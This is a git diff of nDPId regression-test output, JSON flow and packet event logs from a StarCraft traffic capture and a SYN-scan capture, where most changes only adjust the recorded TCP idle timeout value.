+00685{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1437389985320,"flow_last_seen":1437389985635,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":499,"flow_tot_l4_payload_len":644,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"80.239.186.26","src_port":3524,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} +00688{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":1437389985434,"flow_last_seen":1437389985610,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":3255,"flow_avg_l4_payload_len":271,"midstream":0,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"80.239.186.40","src_port":3525,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} +00688{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"finished","flow_packets_processed":11,"flow_first_seen":1437389985446,"flow_last_seen":1437389985631,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":3062,"flow_avg_l4_payload_len":278,"midstream":0,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"80.239.186.40","src_port":3526,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": 
{"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} 00655{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1437389955670,"flow_last_seen":1437389984611,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":41,"flow_tot_l4_payload_len":223,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"173.194.40.22","dst_ip":"192.168.1.100","src_port":443,"dst_port":53568,"l4_proto":"udp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"Google","breed":"Acceptable","category":"Web"}} 00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1437389955670,"flow_last_seen":1437389984611,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":41,"flow_tot_l4_payload_len":223,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"173.194.40.22","dst_ip":"192.168.1.100","src_port":443,"dst_port":53568,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00648{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1437389982769,"flow_last_seen":1437389982823,"flow_idle_time":180000,"flow_min_l4_payload_len":2,"flow_max_l4_payload_len":2,"flow_tot_l4_payload_len":4,"flow_avg_l4_payload_len":2,"midstream":0,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"5.42.180.154","src_port":53146,"dst_port":1119,"l4_proto":"udp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"Starcraft","breed":"Fun","category":"Game"}} 
00588{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1437389982769,"flow_last_seen":1437389982823,"flow_idle_time":180000,"flow_min_l4_payload_len":2,"flow_max_l4_payload_len":2,"flow_tot_l4_payload_len":4,"flow_avg_l4_payload_len":2,"midstream":0,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"5.42.180.154","src_port":53146,"dst_port":1119,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00645{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1437389968487,"flow_last_seen":1437389968610,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"199.38.164.156","src_port":3486,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} -00588{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1437389968487,"flow_last_seen":1437389968610,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"199.38.164.156","src_port":3486,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00645{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1437389968487,"flow_last_seen":1437389968610,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"199.38.164.156","src_port":3486,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} +00588{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1437389968487,"flow_last_seen":1437389968610,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"199.38.164.156","src_port":3486,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00697{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":11,"flow_first_seen":1437389963466,"flow_last_seen":1437389963469,"flow_idle_time":180000,"flow_min_l4_payload_len":372,"flow_max_l4_payload_len":452,"flow_tot_l4_payload_len":4522,"flow_avg_l4_payload_len":411,"midstream":0,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.254","dst_ip":"239.255.255.250","src_port":38605,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} 
-00945{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"finished","flow_packets_processed":179,"flow_first_seen":1437389964790,"flow_last_seen":1437389968014,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":124502,"flow_avg_l4_payload_len":695,"midstream":0,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"87.248.221.254","src_port":3508,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"4": {"risk":"Binary Application Transfer","severity":"Severe","risk_score": {"total":250,"client":225,"server":25}},"16": {"risk":"Suspicious DGA Domain name","severity":"High","risk_score": {"total":250,"client":125,"server":125}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Download"}} -00643{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437389954123,"flow_last_seen":1437389954123,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"80.239.186.26","dst_ip":"192.168.1.100","src_port":443,"dst_port":3476,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} 
-00586{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437389954123,"flow_last_seen":1437389954123,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"80.239.186.26","dst_ip":"192.168.1.100","src_port":443,"dst_port":3476,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00643{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437389955642,"flow_last_seen":1437389955642,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"80.239.186.40","dst_ip":"192.168.1.100","src_port":443,"dst_port":3478,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} -00586{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437389955642,"flow_last_seen":1437389955642,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"80.239.186.40","dst_ip":"192.168.1.100","src_port":443,"dst_port":3478,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00945{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"finished","flow_packets_processed":179,"flow_first_seen":1437389964790,"flow_last_seen":1437389968014,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":124502,"flow_avg_l4_payload_len":695,"midstream":0,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"87.248.221.254","src_port":3508,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"4": {"risk":"Binary Application Transfer","severity":"Severe","risk_score": {"total":250,"client":225,"server":25}},"16": {"risk":"Suspicious DGA Domain name","severity":"High","risk_score": {"total":250,"client":125,"server":125}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Download"}} +00643{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437389954123,"flow_last_seen":1437389954123,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"80.239.186.26","dst_ip":"192.168.1.100","src_port":443,"dst_port":3476,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} 
+00586{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437389954123,"flow_last_seen":1437389954123,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"80.239.186.26","dst_ip":"192.168.1.100","src_port":443,"dst_port":3476,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00643{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437389955642,"flow_last_seen":1437389955642,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"80.239.186.40","dst_ip":"192.168.1.100","src_port":443,"dst_port":3478,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} +00586{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437389955642,"flow_last_seen":1437389955642,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"80.239.186.40","dst_ip":"192.168.1.100","src_port":443,"dst_port":3478,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1437389953741,"flow_last_seen":1437389953805,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":112,"flow_tot_l4_payload_len":264,"flow_avg_l4_payload_len":66,"midstream":0,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"192.168.1.254","src_port":58818,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} 00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1437389954543,"flow_last_seen":1437389954714,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":117,"flow_tot_l4_payload_len":249,"flow_avg_l4_payload_len":62,"midstream":0,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"192.168.1.254","src_port":58831,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} 00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1437389955747,"flow_last_seen":1437389955800,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":82,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":63,"midstream":0,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"192.168.1.254","src_port":58844,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": 
{"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} 00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1437389956550,"flow_last_seen":1437389956605,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":115,"flow_tot_l4_payload_len":287,"flow_avg_l4_payload_len":71,"midstream":0,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"192.168.1.254","src_port":58851,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} -00694{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"finished","flow_packets_processed":9,"flow_first_seen":1437389967432,"flow_last_seen":1437389968027,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":273,"flow_tot_l4_payload_len":358,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"12.129.222.54","src_port":3512,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.WorldOfWarcraft","breed":"Fun","category":"Game"}} 
+00694{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"finished","flow_packets_processed":9,"flow_first_seen":1437389967432,"flow_last_seen":1437389968027,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":273,"flow_tot_l4_payload_len":358,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"12.129.222.54","src_port":3512,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.WorldOfWarcraft","breed":"Fun","category":"Game"}} 00573{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","packets-captured":800,"packets-processed":797,"total-skipped-flows":0,"total-l4-data-len":316668,"total-not-detected-flows":0,"total-guessed-flows":22,"total-detected-flows":30,"total-detection-updates":12,"total-updates":0,"current-active-flows":0,"total-active-flows":52,"total-idle-flows":52,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":315,"global_ts_msec":1437389985996} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 800/797 diff --git a/test/results/synscan.pcap.out b/test/results/synscan.pcap.out index 7e5809037..ea9c358d7 100644 --- a/test/results/synscan.pcap.out +++ b/test/results/synscan.pcap.out 
@@ -1,7992 +1,7992 @@ 00458{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"synscan.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0} 00544{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"synscan.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1278275056274} -00572{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275056274,"flow_last_seen":1278275056274,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275056274,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1278275056274,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275056274,"pkt":"ACYLMQczACWzv5HuCABFAAAs5wgAADYGK2qsEAAIQA2GNIzSAbvdUoMYAAAAAGACDAAq1AAAAgQFtA=="} -00572{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2,"source":"synscan.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275056276,"flow_last_seen":1278275056276,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275056276,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":143,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00457{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"synscan.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1278275056276,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275056276,"pkt":"ACYLMQczACWzv5HuCABFAAAsWtAAAC4Gv6KsEAAIQA2GNIzSAI\/dUoMYAAAAAGACDAAsAAAAAgQFtA=="} 
-00573{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3,"source":"synscan.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275056276,"flow_last_seen":1278275056276,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275056276,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3306,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"synscan.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1278275056276,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275056276,"pkt":"ACYLMQczACWzv5HuCABFAAAsxSoAAC0GVkisEAAIQA2GNIzSDOrdUoMYAAAAAGACCAAjpQAAAgQFtA=="} -00572{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4,"source":"synscan.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275056276,"flow_last_seen":1278275056276,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275056276,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":199,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4,"source":"synscan.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1278275056276,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275056276,"pkt":"ACYLMQczACWzv5HuCABFAAAsXg4AACoGwGSsEAAIQA2GNIzSAMfdUoMYAAAAAGACDAAryAAAAgQFtA=="} -00572{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5,"source":"synscan.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275056276,"flow_last_seen":1278275056276,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275056276,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":111,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00457{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5,"source":"synscan.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1278275056276,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275056276,"pkt":"ACYLMQczACWzv5HuCABFAAAs72YAADQGJQysEAAIQA2GNIzSAG\/dUoMYAAAAAGACBAA0IAAAAgQFtA=="} 
-00573{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6,"source":"synscan.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275056276,"flow_last_seen":1278275056276,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275056276,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1025,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6,"source":"synscan.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":1278275056276,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275056276,"pkt":"ACYLMQczACWzv5HuCABFAAAsQzMAACsG2j+sEAAIQA2GNIzSBAHdUoMYAAAAAGACEAAkjgAAAgQFtA=="} -00572{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7,"source":"synscan.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275056276,"flow_last_seen":1278275056276,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275056276,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":995,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
